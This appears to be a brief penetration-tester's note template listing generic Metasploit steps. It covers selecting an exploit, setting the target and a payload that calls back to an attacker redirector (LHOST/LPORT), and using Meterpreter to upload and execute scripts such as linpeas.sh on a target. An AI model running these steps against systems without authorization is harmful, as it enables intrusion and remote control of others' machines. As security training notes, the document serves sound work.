# **Basic Information** # **MSFConsole** ```bash # start metasploit msfconsole -qn # search for and use an exploit search <exploit_name> use <exploit_name> # configure the exploit set RHOST <target_ip> set RPORT <target_port> set payload set LHOST <redir_ip> set LPORT <redir_port> check exploit ``` # **Meterpreter Shell Commands** ```bash # upload file to target, such as linpeas.sh upload </local/file.txt> </remote/file.txt> # run a script, such as linpeas.sh execute -i -f bash -a </remote/file.sh> ``` # **References** # **Practical Application** | Platform | Name | Notes | | -------- | ---- | ----- | | | | |